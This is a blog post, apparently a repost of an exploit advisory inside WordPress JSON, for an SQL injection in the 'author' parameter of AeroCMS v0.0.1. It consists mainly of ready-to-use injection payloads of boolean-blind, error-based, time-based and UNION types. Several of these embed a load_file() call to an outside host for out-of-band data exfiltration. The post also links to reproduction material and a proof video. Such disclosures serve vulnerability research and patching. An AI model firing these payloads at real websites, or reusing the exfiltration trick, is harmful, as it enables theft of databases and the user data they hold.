## Title: AeroCMS-v0.0.1 SQLi
\n## Author: nu11secur1ty
\n## Date: 08.27.2022
\n## Vendor: https:\/\/github.com\/MegaTKC
\n## Software: https:\/\/github.com\/MegaTKC\/AeroCMS\/releases\/tag\/v0.0.1
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi<\/p>\n
## Description:
\nThe `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
\nbe vulnerable to SQL injection attacks.
\nThe malicious user can dump-steal the database, from this CMS system
\nand he can use it for very malicious purposes.<\/p>\n
STATUS: HIGH Vulnerability<\/p>\n
[+]Payload:
\n“`mysql
\n—
\nParameter: author (GET)
\nType: boolean-based blind
\nTitle: OR boolean-based blind – WHERE or HAVING clause
\nPayload: author=-5045′ OR 8646=8646 AND ‘YeVm’=’YeVm&p_id=4<\/p>\n
Type: error-based
\nTitle: MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or
\nGROUP BY clause (FLOOR)
\nPayload: author=admin’+(select
\nload_file(‘\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq’))+”
\nOR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
\n(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘mwLN’=’mwLN&p_id=4<\/p>\n
Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: author=admin’+(select
\nload_file(‘\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq’))+”
\nAND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND ‘zVTI’=’zVTI&p_id=4<\/p>\n
Type: UNION query
\nTitle: MySQL UNION query (NULL) – 10 columns
\nPayload: author=admin’+(select
\nload_file(‘\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq’))+”
\nUNION ALL SELECT
\nNULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
\n—<\/p>\n
“`<\/p>\n
## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/streamable.com\/ir9bjt)<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: AeroCMS-v0.0.1 SQLi ## Author: nu11secur1ty ## Date: 08.27.2022 ## Vendor: https:\/\/github.com\/MegaTKC ## Software: https:\/\/github.com\/MegaTKC\/AeroCMS\/releases\/tag\/v0.0.1 ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi ## Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29779","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29779"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29779\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}